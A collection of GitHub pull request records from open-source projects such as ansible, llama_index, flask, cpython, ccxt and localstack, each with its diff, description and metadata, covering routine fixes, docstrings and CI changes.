-c "import sys; print(sys.executable)") - -virtualenv --system-site-packages --python "${PYTHON}" "${MYTMPDIR}/jinja2" +virtualenv --system-site-packages --python "${ANSIBLE_TEST_PYTHON_INTERPRETER}" "${MYTMPDIR}/jinja2" source "${MYTMPDIR}/jinja2/bin/activate"
##### SUMMARY Fix tests to use ANSIBLE_TEST_PYTHON_INTERPRETER. ##### ISSUE TYPE Bugfix Pull Request ##### COMPONENT NAME integration tests
https://api.github.com/repos/ansible/ansible/pulls/52352
2019-02-15T19:17:39Z
2019-02-15T19:24:08Z
2019-02-15T19:24:08Z
2019-07-25T16:50:47Z
534
ansible/ansible
48,881
fix for complex conditional links in query pipeline
diff --git a/llama-index-core/llama_index/core/query_pipeline/query.py b/llama-index-core/llama_index/core/query_pipeline/query.py index 15c72d6658902..d6abc16ec7cf5 100644 --- a/llama-index-core/llama_index/core/query_pipeline/query.py +++ b/llama-index-core/llama_index/core/query_pipeline/query.py @@ -477,11 +477,16 @@ def _process_component_output( ) -> List[str]: """Process component output.""" new_queue = queue.copy() - # if there's no more edges, add result to output + + nodes_to_keep = set() + nodes_to_remove = set() + + # if there's no more edges, clear queue if module_key in self._get_leaf_keys(): - result_outputs[module_key] = output_dict + new_queue = [] else: edge_list = list(self.dag.edges(module_key, data=True)) + # everything not in conditional_edge_list is regular for _, dest, attr in edge_list: output = get_output(attr.get("src_key"), output_dict) @@ -505,9 +510,56 @@ def _process_component_output( self.module_dict[dest], all_module_inputs[dest], ) + nodes_to_keep.add(dest) else: - # remove dest from queue - new_queue.remove(dest) + nodes_to_remove.add(dest) + + # remove nodes from the queue, as well as any nodes that depend on dest + # be sure to not remove any remaining dependencies of the current path + available_paths = [] + for node in nodes_to_keep: + for leaf_node in self._get_leaf_keys(): + if leaf_node == node: + available_paths.append([node]) + else: + available_paths.extend( + list( + networkx.all_simple_paths( + self.dag, source=node, target=leaf_node + ) + ) + ) + + # this is a list of all nodes between the current node(s) and the leaf nodes + nodes_to_never_remove = set(x for path in available_paths for x in path) # noqa + + removal_paths = [] + for node in nodes_to_remove: + for leaf_node in self._get_leaf_keys(): + if leaf_node == node: + removal_paths.append([node]) + else: + removal_paths.extend( + list( + networkx.all_simple_paths( + self.dag, source=node, target=leaf_node + ) + ) + ) + + # this is a list of all nodes between the current node(s) to remove and the leaf nodes + nodes_to_probably_remove = set( # noqa + x for path in removal_paths for x in path + ) + + # remove nodes that are not in the current path + for node in nodes_to_probably_remove: + if node not in nodes_to_never_remove: + new_queue.remove(node) + + # did we remove all remaining edges? then we have our result + if len(new_queue) == 0: + result_outputs[module_key] = output_dict return new_queue diff --git a/llama-index-core/tests/query_pipeline/test_query.py b/llama-index-core/tests/query_pipeline/test_query.py index 9ae780cdeea35..d306cac737f0f 100644 --- a/llama-index-core/tests/query_pipeline/test_query.py +++ b/llama-index-core/tests/query_pipeline/test_query.py @@ -408,3 +408,91 @@ def choose_fn(input: int) -> Dict: output = p.run(inp1=2, inp2=3) # should go to b assert output == "3:2" + + +def test_query_pipeline_super_conditional() -> None: + """This tests that paths are properly pruned and maintained for many conditional edges.""" + + def simple_fn(val: int): + print("Running simple_fn", flush=True) + return val + + def over_twenty_fn(val: int): + print("Running over_twenty_fn", flush=True) + return val + 100 + + def final_fn(x: int, y: int, z: int): + print("Running final_fn", flush=True) + return { + "x": x, + "y": y, + "z": z, + } + + simple_function_component = FnComponent(fn=simple_fn, output_key="output") + over_twenty_function_2 = FnComponent(fn=over_twenty_fn, output_key="output") + final_fn = FnComponent(fn=final_fn, output_key="output") + + qp = QueryPipeline( + modules={ + "first_decision": simple_function_component, + "second_decision": simple_function_component, + "under_ten": simple_function_component, + "over_twenty": simple_function_component, + "over_twenty_2": over_twenty_function_2, + "final": final_fn, + }, + verbose=True, + ) + + qp.add_link( + "first_decision", + "under_ten", + condition_fn=lambda x: x < 10, + ) + qp.add_link("under_ten", "final", dest_key="x") + qp.add_link("under_ten", "final", dest_key="y") + qp.add_link("under_ten", "final", dest_key="z") + + qp.add_link( + "first_decision", + "second_decision", + condition_fn=lambda x: x >= 10, + ) + + qp.add_link( + "second_decision", + "over_twenty", + condition_fn=lambda x: x > 20, + ) + qp.add_link( + "second_decision", + "over_twenty_2", + condition_fn=lambda x: x > 20, + ) + + qp.add_link( + "second_decision", + "final", + dest_key="z", + condition_fn=lambda x: x > 20, + ) + qp.add_link( + "over_twenty", + "final", + dest_key="x", + ) + qp.add_link( + "over_twenty_2", + "final", + dest_key="y", + ) + + response = qp.run(val=9) + assert response == {"x": 9, "y": 9, "z": 9} + + response = qp.run(val=11) + assert response == 11 + + response = qp.run(val=21) + assert response == {"x": 21, "y": 121, "z": 21}
There is an issue that complex query pipelines with conditional links lead to the state of the `queue` from the topological sort to get into an invalid state when an node is removed from the queue, we need to remove all its dependencies. The catch here is that we cant remove dependencies that still lie on a valid path.
https://api.github.com/repos/run-llama/llama_index/pulls/12805
2024-04-12T22:06:56Z
2024-04-14T04:32:21Z
2024-04-14T04:32:21Z
2024-04-14T04:32:21Z
1,521
run-llama/llama_index
6,022
Fix typo in pop documentation
diff --git a/src/flask/ctx.py b/src/flask/ctx.py index 172f6a01b3..4e6b40b177 100644 --- a/src/flask/ctx.py +++ b/src/flask/ctx.py @@ -61,7 +61,7 @@ def pop(self, name, default=_sentinel): :param name: Name of attribute to pop. :param default: Value to return if the attribute is not present, - instead of raise a ``KeyError``. + instead of raising a ``KeyError``. .. versionadded:: 0.11 """
<!-- Commit checklist: * add tests that fail without the patch * ensure all tests pass with ``pytest`` * add documentation to the relevant docstrings or pages * add ``versionadded`` or ``versionchanged`` directives to relevant docstrings * add a changelog entry if this patch changes code Tests, coverage, and docs will be run automatically when you submit the pull request, but running them yourself can save time. --> Just fixes a minor typo I noticed while reading the docs.
https://api.github.com/repos/pallets/flask/pulls/3336
2019-08-16T01:06:03Z
2019-08-16T01:30:06Z
2019-08-16T01:30:06Z
2020-11-14T01:52:45Z
141
pallets/flask
20,024
bpo-32237: Fix missing DECREF of mod
diff --git a/Python/import.c b/Python/import.c index 57521e4920715c..96839c6935a4ba 100644 --- a/Python/import.c +++ b/Python/import.c @@ -1729,6 +1729,7 @@ PyImport_ImportModuleLevelObject(PyObject *name, PyObject *globals, } } else { + Py_XDECREF(mod); mod = import_find_and_load(abs_name); if (mod == NULL) { goto error;
The code reorg in commit eea3cc1ef0dec0af193eedb4c1164263fbdfd8cc introduced a leak by accidentally dropping an Py_XDECREF(mod) call. The fix is trivial. <!-- issue-number: bpo-32237 --> https://bugs.python.org/issue32237 <!-- /issue-number -->
https://api.github.com/repos/python/cpython/pulls/4749
2017-12-07T17:35:09Z
2017-12-08T00:25:00Z
2017-12-08T00:25:00Z
2017-12-08T00:25:02Z
113
python/cpython
4,358
Create Onepad_Cipher.py
diff --git a/ciphers/Onepad_Cipher.py b/ciphers/Onepad_Cipher.py new file mode 100644 index 000000000000..4365924920f6 --- /dev/null +++ b/ciphers/Onepad_Cipher.py @@ -0,0 +1,28 @@ +class Onepad: + def encrypt(self, text): + '''Function to encrypt text using psedo-random numbers''' + plain = [] + key = [] + cipher = [] + for i in text: + plain.append(ord(i)) + for i in plain: + k = random.randint(1, 300) + c = (i+k)*k + cipher.append(c) + key.append(k) + return cipher, key + + def decrypt(self, cipher, key): + '''Function to decrypt text using psedo-random numbers.''' + plain = [] + for i in range(len(key)): + p = (cipher[i]-(key[i])**2)/key[i] + plain.append(chr(p)) + plain = ''.join([i for i in plain]) + return plain + +if __name__ == '__main__': + c,k = Onepad().encrypt('Hello') + print c, k + print Onepad().decrypt(c, k)
In one pad algorithm length of key and length of message are equal which results in endless possibilities of false messages on bruteforce.
https://api.github.com/repos/TheAlgorithms/Python/pulls/285
2018-04-13T15:51:58Z
2018-04-13T16:41:50Z
2018-04-13T16:41:50Z
2018-04-13T16:41:50Z
295
TheAlgorithms/Python
30,006
Temporarily disable Apache 2.2 support
diff --git a/letsencrypt-apache/letsencrypt_apache/configurator.py b/letsencrypt-apache/letsencrypt_apache/configurator.py index 4066d626493..2ce9d008b2c 100644 --- a/letsencrypt-apache/letsencrypt_apache/configurator.py +++ b/letsencrypt-apache/letsencrypt_apache/configurator.py @@ -154,7 +154,7 @@ def prepare(self): # Set Version if self.version is None: self.version = self.get_version() - if self.version < (2, 2): + if self.version < (2, 4): raise errors.NotSupportedError( "Apache Version %s not supported.", str(self.version))
ping @pde
https://api.github.com/repos/certbot/certbot/pulls/2171
2016-01-14T00:17:51Z
2016-01-14T00:26:04Z
2016-01-14T00:26:04Z
2016-01-28T20:45:02Z
164
certbot/certbot
2,607
[MRG] Use ccache on Travis
diff --git a/.travis.yml b/.travis.yml index a0740180adbfb..3bdf91f4ab4d4 100644 --- a/.travis.yml +++ b/.travis.yml @@ -7,6 +7,7 @@ cache: apt: true directories: - $HOME/.cache/pip + - $HOME/.ccache dist: trusty diff --git a/build_tools/travis/install.sh b/build_tools/travis/install.sh index fe0d46821e29d..257cfb17f3938 100755 --- a/build_tools/travis/install.sh +++ b/build_tools/travis/install.sh @@ -13,15 +13,16 @@ set -e -# Fix the compilers to workaround avoid having the Python 3.4 build -# lookup for g++44 unexpectedly. -export CC=gcc -export CXX=g++ - echo 'List files from cached directories' echo 'pip:' ls $HOME/.cache/pip +export CC=/usr/lib/ccache/gcc +export CXX=/usr/lib/ccache/g++ +# Useful for debugging how ccache is used +# export CCACHE_LOGFILE=/tmp/ccache.log +# ~60M is used by .ccache when compiling from scratch at the time of writing +ccache --max-size 100M --show-stats if [[ "$DISTRIB" == "conda" ]]; then # Deactivate the travis-provided virtual environment and setup a @@ -99,8 +100,10 @@ try: except ImportError: pass " - python setup.py develop + ccache --show-stats + # Useful for debugging how ccache is used + # cat $CCACHE_LOGFILE fi if [[ "$RUN_FLAKE8" == "true" ]]; then
Use ccache and add .ccache to the Travis cache. This should save 2-4 minutes of compilation on each build that builds scikit-learn. In some tests on Travis there seems to be some variability but here is what I found (I used `time python setup.py develop` to have a better idea about the timings): * when ccache is working `python setup.py develop` takes 45s-1min (cython compilation) * without ccache it is about 3-5 min (cython compilation + compilation of generated .c and .cpp files I tried many different things but for some reason just using "export PATH=/usr/lib/ccache:$PATH" as I do locally does not seem to be enough ...
https://api.github.com/repos/scikit-learn/scikit-learn/pulls/9006
2017-06-06T13:22:02Z
2017-06-09T09:22:21Z
2017-06-09T09:22:21Z
2017-06-09T09:22:24Z
402
scikit-learn/scikit-learn
46,002
add margin docstrings
diff --git a/js/ascendex.js b/js/ascendex.js index ff04e5445e3f..43129ff1a586 100644 --- a/js/ascendex.js +++ b/js/ascendex.js @@ -2514,6 +2514,15 @@ module.exports = class ascendex extends Exchange { } async addMargin (symbol, amount, params = {}) { + /** + * @method + * @name ascendex#addMargin + * @description add margin + * @param {str} symbol unified market symbol + * @param {float} amount amount of margin to add + * @param {dict} params extra parameters specific to the ascendex api endpoint + * @returns {dict} a [margin structure]{@link https://docs.ccxt.com/en/latest/manual.html#add-margin-structure} + */ return await this.modifyMarginHelper (symbol, amount, 'add', params); } diff --git a/js/binance.js b/js/binance.js index 09bd3012fb26..e783e2061425 100644 --- a/js/binance.js +++ b/js/binance.js @@ -5551,6 +5551,15 @@ module.exports = class binance extends Exchange { } async addMargin (symbol, amount, params = {}) { + /** + * @method + * @name binance#addMargin + * @description add margin + * @param {str} symbol unified market symbol + * @param {float} amount amount of margin to add + * @param {dict} params extra parameters specific to the binance api endpoint + * @returns {dict} a [margin structure]{@link https://docs.ccxt.com/en/latest/manual.html#add-margin-structure} + */ return await this.modifyMarginHelper (symbol, amount, 1, params); } diff --git a/js/bitget.js b/js/bitget.js index f468406d56c6..acb0c2f61c75 100644 --- a/js/bitget.js +++ b/js/bitget.js @@ -2783,6 +2783,15 @@ module.exports = class bitget extends Exchange { } async addMargin (symbol, amount, params = {}) { + /** + * @method + * @name bitget#addMargin + * @description add margin + * @param {str} symbol unified market symbol + * @param {float} amount amount of margin to add + * @param {dict} params extra parameters specific to the bitget api endpoint + * @returns {dict} a [margin structure]{@link https://docs.ccxt.com/en/latest/manual.html#add-margin-structure} + */ const holdSide = this.safeString (params, 'holdSide'); if (holdSide === undefined) { throw new ArgumentsRequired (this.id + ' addMargin() requires a holdSide parameter, either long or short'); diff --git a/js/coinex.js b/js/coinex.js index 973e2230ee6d..a19180b0cd0e 100644 --- a/js/coinex.js +++ b/js/coinex.js @@ -3147,6 +3147,15 @@ module.exports = class coinex extends Exchange { } async addMargin (symbol, amount, params = {}) { + /** + * @method + * @name coinex#addMargin + * @description add margin + * @param {str} symbol unified market symbol + * @param {float} amount amount of margin to add + * @param {dict} params extra parameters specific to the coinex api endpoint + * @returns {dict} a [margin structure]{@link https://docs.ccxt.com/en/latest/manual.html#add-margin-structure} + */ return await this.modifyMarginHelper (symbol, amount, 1, params); } diff --git a/js/exmo.js b/js/exmo.js index 38a4eeeb2301..0a04c4a8aded 100644 --- a/js/exmo.js +++ b/js/exmo.js @@ -268,6 +268,15 @@ module.exports = class exmo extends Exchange { } async addMargin (symbol, amount, params = {}) { + /** + * @method + * @name exmo#addMargin + * @description add margin + * @param {str} symbol unified market symbol + * @param {float} amount amount of margin to add + * @param {dict} params extra parameters specific to the exmo api endpoint + * @returns {dict} a [margin structure]{@link https://docs.ccxt.com/en/latest/manual.html#add-margin-structure} + */ return await this.modifyMarginHelper (symbol, amount, 'add', params); } diff --git a/js/hitbtc3.js b/js/hitbtc3.js index 3abbdaafe6a7..c8932d6d8334 100644 --- a/js/hitbtc3.js +++ b/js/hitbtc3.js @@ -2266,6 +2266,15 @@ module.exports = class hitbtc3 extends Exchange { } async addMargin (symbol, amount, params = {}) { + /** + * @method + * @name hitbtc3#addMargin + * @description add margin + * @param {str} symbol unified market symbol + * @param {float} amount amount of margin to add + * @param {dict} params extra parameters specific to the hitbtc3 api endpoint + * @returns {dict} a [margin structure]{@link https://docs.ccxt.com/en/latest/manual.html#add-margin-structure} + */ return await this.modifyMarginHelper (symbol, amount, 'add', params); } diff --git a/js/kucoinfutures.js b/js/kucoinfutures.js index aef9b03a61f7..699386030fc1 100644 --- a/js/kucoinfutures.js +++ b/js/kucoinfutures.js @@ -1143,6 +1143,15 @@ module.exports = class kucoinfutures extends kucoin { } async addMargin (symbol, amount, params = {}) { + /** + * @method + * @name kucoinfutures#addMargin + * @description add margin + * @param {str} symbol unified market symbol + * @param {float} amount amount of margin to add + * @param {dict} params extra parameters specific to the kucoinfutures api endpoint + * @returns {dict} a [margin structure]{@link https://docs.ccxt.com/en/latest/manual.html#add-margin-structure} + */ await this.loadMarkets (); const market = this.market (symbol); const uuid = this.uuid (); diff --git a/js/mexc.js b/js/mexc.js index 7f79f6da72af..ee1e3499c614 100644 --- a/js/mexc.js +++ b/js/mexc.js @@ -2745,6 +2745,15 @@ module.exports = class mexc extends Exchange { } async addMargin (symbol, amount, params = {}) { + /** + * @method + * @name mexc#addMargin + * @description add margin + * @param {str} symbol unified market symbol + * @param {float} amount amount of margin to add + * @param {dict} params extra parameters specific to the mexc api endpoint + * @returns {dict} a [margin structure]{@link https://docs.ccxt.com/en/latest/manual.html#add-margin-structure} + */ return await this.modifyMarginHelper (symbol, amount, 'ADD', params); } diff --git a/js/mexc3.js b/js/mexc3.js index bcbd31ad52a0..848e37f812eb 100644 --- a/js/mexc3.js +++ b/js/mexc3.js @@ -2751,6 +2751,15 @@ module.exports = class mexc3 extends Exchange { } async addMargin (symbol, amount, params = {}) { + /** + * @method + * @name mexc3#addMargin + * @description add margin + * @param {str} symbol unified market symbol + * @param {float} amount amount of margin to add + * @param {dict} params extra parameters specific to the mexc3 api endpoint + * @returns {dict} a [margin structure]{@link https://docs.ccxt.com/en/latest/manual.html#add-margin-structure} + */ return await this.modifyMarginHelper (symbol, amount, 'ADD', params); } diff --git a/js/okx.js b/js/okx.js index 61b29fa8eb52..84c576684828 100644 --- a/js/okx.js +++ b/js/okx.js @@ -4705,6 +4705,15 @@ module.exports = class okx extends Exchange { } async addMargin (symbol, amount, params = {}) { + /** + * @method + * @name okx#addMargin + * @description add margin + * @param {str} symbol unified market symbol + * @param {float} amount amount of margin to add + * @param {dict} params extra parameters specific to the okx api endpoint + * @returns {dict} a [margin structure]{@link https://docs.ccxt.com/en/latest/manual.html#add-margin-structure} + */ return await this.modifyMarginHelper (symbol, amount, 'add', params); } diff --git a/js/zb.js b/js/zb.js index ea07a259fccd..e0bc0f455fe7 100644 --- a/js/zb.js +++ b/js/zb.js @@ -4008,6 +4008,15 @@ module.exports = class zb extends Exchange { } async addMargin (symbol, amount, params = {}) { + /** + * @method + * @name zb#addMargin + * @description add margin + * @param {str} symbol unified market symbol + * @param {float} amount amount of margin to add + * @param {dict} params extra parameters specific to the zb api endpoint + * @returns {dict} a [margin structure]{@link https://docs.ccxt.com/en/latest/manual.html#add-margin-structure} + */ if (params['positionsId'] === undefined) { throw new ArgumentsRequired (this.id + ' addMargin() requires a positionsId argument in the params'); }
https://api.github.com/repos/ccxt/ccxt/pulls/13632
2022-06-06T12:51:45Z
2022-06-07T02:48:48Z
2022-06-07T02:48:48Z
2022-06-07T04:51:27Z
2,456
ccxt/ccxt
13,762
Speed up Travis tests
diff --git a/.travis.yml b/.travis.yml index cd41d57db44..d52eb878d67 100644 --- a/.travis.yml +++ b/.travis.yml @@ -38,10 +38,10 @@ install: # Useful for debugging any issues with conda - conda info -a - - conda create -q -n test-environment python=$TRAVIS_PYTHON_VERSION numpy nose scipy matplotlib pandas pytest h5py + - conda create -q -n test-environment python=$TRAVIS_PYTHON_VERSION pytest pandas - source activate test-environment + - pip install --only-binary=numpy,scipy numpy nose scipy matplotlib h5py theano - conda install mkl mkl-service - - pip install theano # set library path - export LD_LIBRARY_PATH=$HOME/miniconda/envs/test-environment/lib/:$LD_LIBRARY_PATH
https://api.github.com/repos/keras-team/keras/pulls/9386
2018-02-14T02:21:43Z
2018-02-15T18:08:28Z
2018-02-15T18:08:28Z
2018-02-16T03:34:36Z
208
keras-team/keras
47,057
bpo-1635741: Fix unicode_dealloc() for mortal interned string
diff --git a/Objects/unicodeobject.c b/Objects/unicodeobject.c index 37e7fe5c0eff26..ca68c57534b229 100644 --- a/Objects/unicodeobject.c +++ b/Objects/unicodeobject.c @@ -1943,13 +1943,20 @@ unicode_dealloc(PyObject *unicode) break; case SSTATE_INTERNED_MORTAL: - /* revive dead object temporarily for DelItem */ - Py_SET_REFCNT(unicode, 3); #ifdef INTERNED_STRINGS + /* Revive the dead object temporarily. PyDict_DelItem() removes two + references (key and value) which were ignored by + PyUnicode_InternInPlace(). Use refcnt=3 rather than refcnt=2 + to prevent calling unicode_dealloc() again. Adjust refcnt after + PyDict_DelItem(). */ + assert(Py_REFCNT(unicode) == 0); + Py_SET_REFCNT(unicode, 3); if (PyDict_DelItem(interned, unicode) != 0) { _PyErr_WriteUnraisableMsg("deletion of interned string failed", NULL); } + assert(Py_REFCNT(unicode) == 1); + Py_SET_REFCNT(unicode, 0); #endif break; @@ -15710,8 +15717,9 @@ PyUnicode_InternInPlace(PyObject **p) return; } - /* The two references in interned are not counted by refcnt. - The deallocator will take care of this */ + /* The two references in interned dict (key and value) are not counted by + refcnt. unicode_dealloc() and _PyUnicode_ClearInterned() take care of + this. */ Py_SET_REFCNT(s, Py_REFCNT(s) - 2); _PyUnicode_STATE(s).interned = SSTATE_INTERNED_MORTAL; #endif @@ -15780,6 +15788,8 @@ _PyUnicode_ClearInterned(PyThreadState *tstate) #endif break; case SSTATE_INTERNED_MORTAL: + // Restore the two references (key and value) ignored + // by PyUnicode_InternInPlace(). Py_SET_REFCNT(s, Py_REFCNT(s) + 2); #ifdef INTERNED_STATS mortal_size += PyUnicode_GET_LENGTH(s);
When unicode_dealloc() is called on a mortal interned string, the string reference counter is now reset at zero, rather than leaking one reference. <!-- Thanks for your contribution! Please read this comment in its entirety. It's quite important. # Pull Request title It should be in the following format: ``` bpo-NNNN: Summary of the changes made ``` Where: bpo-NNNN refers to the issue number in the https://bugs.python.org. Most PRs will require an issue number. Trivial changes, like fixing a typo, do not need an issue. # Backport Pull Request title If this is a backport PR (PR made against branches other than `master`), please ensure that the PR title is in the following format: ``` [X.Y] <title from the original PR> (GH-NNNN) ``` Where: [X.Y] is the branch name, e.g. [3.6]. GH-NNNN refers to the PR number from `master`. --> <!-- issue-number: [bpo-1635741](https://bugs.python.org/issue1635741) --> https://bugs.python.org/issue1635741 <!-- /issue-number -->
https://api.github.com/repos/python/cpython/pulls/21270
2020-07-01T23:21:20Z
2020-07-03T14:59:13Z
2020-07-03T14:59:13Z
2020-07-03T14:59:41Z
548
python/cpython
4,784
small typo fix
diff --git a/fileinfo.py b/fileinfo.py index 389a0a0aac..d5c200b9e5 100644 --- a/fileinfo.py +++ b/fileinfo.py @@ -28,7 +28,7 @@ print ("\nNameError : [%s] No such file or directory\n", file_name) if try_count == 0: - print ("Trial limit exceded \nExiting program") + print ("Trial limit exceeded \nExiting program") sys.exit() # create a dictionary to hold file info
from 'exceded' to 'exceeded'
https://api.github.com/repos/geekcomputers/Python/pulls/192
2017-07-06T11:15:52Z
2017-07-06T21:26:22Z
2017-07-06T21:26:22Z
2017-07-06T21:26:22Z
124
geekcomputers/Python
31,322
fixed broken link to community edition (versions)
diff --git a/README.md b/README.md index c22c675a27..240d03a698 100644 --- a/README.md +++ b/README.md @@ -12,7 +12,7 @@ Manim is an engine for precise programmatic animations, designed for creating explanatory math videos. -Note, there are two versions of manim. This repository began as a personal project by the author of [3Blue1Brown](https://www.3blue1brown.com/) for the purpose of animating those videos, with video-specific code available [here](https://github.com/3b1b/videos). In 2020 a group of developers forked it into what is now the [community edition](https://github.com/ManimCommunity/manim/), with a goal of being more stable, better tested, quicker to respond to community contributions, and all around friendlier to get started with. See [this page](https://docs.manim.community/en/stable/installation/versions.html?highlight=OpenGL#which-version-to-use) for more details. +Note, there are two versions of manim. This repository began as a personal project by the author of [3Blue1Brown](https://www.3blue1brown.com/) for the purpose of animating those videos, with video-specific code available [here](https://github.com/3b1b/videos). In 2020 a group of developers forked it into what is now the [community edition](https://github.com/ManimCommunity/manim/), with a goal of being more stable, better tested, quicker to respond to community contributions, and all around friendlier to get started with. See [this page](https://docs.manim.community/en/stable/faq/installation.html#different-versions) for more details. ## Installation > **WARNING:** These instructions are for ManimGL _only_. Trying to use these instructions to install [ManimCommunity/manim](https://github.com/ManimCommunity/manim) or instructions there to install this version will cause problems. You should first decide which version you wish to install, then only follow the instructions for your desired version.
<!-- Thanks for contributing to manim! Please ensure that your pull request works with the latest version of manim. --> ## Motivation <!-- Outline your motivation: In what way do your changes improve the library? --> ## Proposed changes <!-- What you changed in those files --> - - - ## Test <!-- How do you test your changes --> **Code**: **Result**:
https://api.github.com/repos/3b1b/manim/pulls/1840
2022-07-17T09:39:27Z
2022-07-17T10:08:44Z
2022-07-17T10:08:44Z
2022-07-17T10:08:44Z
464
3b1b/manim
18,324
Clean up deprecated Java libs for STS integration with Kinesis client
diff --git a/localstack/constants.py b/localstack/constants.py index 80565c1f97f5a..a24ac0c163cf8 100644 --- a/localstack/constants.py +++ b/localstack/constants.py @@ -137,9 +137,6 @@ ELASTICMQ_JAR_URL = ( "https://s3-eu-west-1.amazonaws.com/softwaremill-public/elasticmq-server-1.1.0.jar" ) -STS_JAR_URL = ( - f"{MAVEN_REPO_URL}/com/amazonaws/aws-java-sdk-sts/1.11.14/aws-java-sdk-sts-1.11.14.jar" -) STEPFUNCTIONS_ZIP_URL = "https://s3.amazonaws.com/stepfunctionslocal/StepFunctionsLocal.zip" KMS_URL_PATTERN = "https://s3-eu-west-2.amazonaws.com/local-kms/3/local-kms_<arch>.bin" diff --git a/localstack/services/install.py b/localstack/services/install.py index 3af3ee0fc3eed..d9bdd3f277ce8 100644 --- a/localstack/services/install.py +++ b/localstack/services/install.py @@ -32,10 +32,8 @@ LIBSQLITE_AARCH64_URL, LOCALSTACK_MAVEN_VERSION, MAVEN_REPO_URL, - MODULE_MAIN_PATH, OPENSEARCH_DEFAULT_VERSION, OPENSEARCH_PLUGIN_LIST, - STS_JAR_URL, ) from localstack.runtime import hooks from localstack.utils.archives import untar, unzip @@ -51,7 +49,7 @@ ) from localstack.utils.functions import run_safe from localstack.utils.http import download -from localstack.utils.platform import get_arch, is_mac_os, is_windows +from localstack.utils.platform import get_arch, is_mac_os from localstack.utils.run import run from localstack.utils.sync import retry from localstack.utils.threads import parallelize @@ -653,30 +651,6 @@ def upgrade_jar_file(base_dir: str, file_glob: str, maven_asset: str): download(maven_asset_url, target_file) -def install_amazon_kinesis_client_libs(): - # install KCL/STS JAR files - if not os.path.exists(INSTALL_PATH_KCL_JAR): - mkdir(INSTALL_DIR_KCL) - tmp_archive = os.path.join(tempfile.gettempdir(), "aws-java-sdk-sts.jar") - if not os.path.exists(tmp_archive): - download(STS_JAR_URL, tmp_archive) - shutil.copy(tmp_archive, INSTALL_DIR_KCL) - - # Compile Java files - from localstack.utils.kinesis import kclipy_helper - - classpath = kclipy_helper.get_kcl_classpath() - - if is_windows(): - classpath = re.sub(r":([^\\])", r";\1", classpath) - java_files = f"{MODULE_MAIN_PATH}/utils/kinesis/java/cloud/localstack/*.java" - class_files = f"{MODULE_MAIN_PATH}/utils/kinesis/java/cloud/localstack/*.class" - if not glob.glob(class_files): - run( - f'javac -source {JAVAC_TARGET_VERSION} -target {JAVAC_TARGET_VERSION} -cp "{classpath}" {java_files}' - ) - - def install_lambda_java_libs(): # install LocalStack "fat" JAR file (contains all dependencies) if not os.path.exists(INSTALL_PATH_LOCALSTACK_FAT_JAR): @@ -874,7 +848,6 @@ def get_installer(self) -> List[Installer]: ("elasticsearch", install_elasticsearch), ("opensearch", install_opensearch), ("kinesalite", install_kinesalite), - ("kinesis-client-libs", install_amazon_kinesis_client_libs), ("kinesis-mock", install_kinesis_mock), ("lambda-java-libs", install_lambda_java_libs), ("local-kms", install_local_kms), @@ -920,7 +893,6 @@ def main(): install_all_components() if sys.argv[1] in ("libs", "testlibs"): # Install additional libraries for testing - install_amazon_kinesis_client_libs() install_lambda_java_testlibs() print("Done.") diff --git a/localstack/utils/kinesis/java/cloud/localstack/DefaultSTSAssumeRoleSessionCredentialsProvider.java b/localstack/utils/kinesis/java/cloud/localstack/DefaultSTSAssumeRoleSessionCredentialsProvider.java deleted file mode 100644 index fa40be599ab76..0000000000000 --- a/localstack/utils/kinesis/java/cloud/localstack/DefaultSTSAssumeRoleSessionCredentialsProvider.java +++ /dev/null @@ -1,59 +0,0 @@ -// TODO: double-check - can potentially be removed! - -package cloud.localstack; - -import java.util.Map; - -import com.amazonaws.auth.AWSCredentialsProvider; -import com.amazonaws.auth.BasicSessionCredentials; -import com.amazonaws.auth.InstanceProfileCredentialsProvider; -import com.amazonaws.auth.STSAssumeRoleSessionCredentialsProvider; -import com.amazonaws.auth.AWSStaticCredentialsProvider; - -/** - * Custom session credentials provider that can be configured to assume a given IAM role. - * Configure the role to assume via the following environment variables: - * - AWS_ASSUME_ROLE_ARN : ARN of the role to assume - * - AWS_ASSUME_ROLE_SESSION_NAME : name of the session to be used when calling assume-role - * - * As long lived credentials, this credentials provider attempts to uses the following: - * - an STS token, via environment variables AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, AWS_SESSION_TOKEN - * - instance profile credentials provider (see Google hits for "EC2 instance metadata service") - * - * TODO: Potentially we could simply use the default credentials provider to obtain the long-lived credentials. - * - * @author Waldemar Hummer - */ -public class DefaultSTSAssumeRoleSessionCredentialsProvider extends STSAssumeRoleSessionCredentialsProvider { - - public DefaultSTSAssumeRoleSessionCredentialsProvider() { - super(getLongLivedCredentialsProvider(), getDefaultRoleARN(), getDefaultRoleSessionName()); - } - - private static String getDefaultRoleARN() { - Map<String, String> env = System.getenv(); - return env.get("AWS_ASSUME_ROLE_ARN"); - } - - private static String getDefaultRoleSessionName() { - Map<String, String> env = System.getenv(); - return env.get("AWS_ASSUME_ROLE_SESSION_NAME"); - } - - private static AWSCredentialsProvider getLongLivedCredentialsProvider() { - Map<String, String> env = System.getenv(); - if(env.containsKey("AWS_SESSION_TOKEN")) { - return new AWSStaticCredentialsProvider( - new BasicSessionCredentials( - env.get("AWS_ACCESS_KEY_ID"), - env.get("AWS_SECRET_ACCESS_KEY"), - env.get("AWS_SESSION_TOKEN"))); - } - return new InstanceProfileCredentialsProvider(false); - } - - public static void main(String args[]) throws Exception { - System.out.println(new DefaultSTSAssumeRoleSessionCredentialsProvider().getCredentials()); - } - -} diff --git a/localstack/utils/kinesis/kinesis_connector.py b/localstack/utils/kinesis/kinesis_connector.py index feff2bd10f9b9..c562eaab7a751 100644 --- a/localstack/utils/kinesis/kinesis_connector.py +++ b/localstack/utils/kinesis/kinesis_connector.py @@ -307,7 +307,7 @@ def get_stream_info( def start_kcl_client_process( - stream_name, + stream_name: str, listener_script, log_file=None, env=None, @@ -328,26 +328,8 @@ def start_kcl_client_process( env = aws_stack.get_environment(env) # make sure to convert stream ARN to stream name stream_name = aws_stack.kinesis_stream_name(stream_name) - # decide which credentials provider to use - credentialsProvider = None - if ("AWS_ASSUME_ROLE_ARN" in os.environ or "AWS_ASSUME_ROLE_ARN" in env_vars) and ( - "AWS_ASSUME_ROLE_SESSION_NAME" in os.environ or "AWS_ASSUME_ROLE_SESSION_NAME" in env_vars - ): - # use special credentials provider that can assume IAM roles and handle temporary STS auth tokens - credentialsProvider = "cloud.localstack.DefaultSTSAssumeRoleSessionCredentialsProvider" - # pass through env variables to child process - for var_name in [ - "AWS_ASSUME_ROLE_ARN", - "AWS_ASSUME_ROLE_SESSION_NAME", - "AWS_ACCESS_KEY_ID", - "AWS_SECRET_ACCESS_KEY", - "AWS_SESSION_TOKEN", - ]: - if var_name in os.environ and 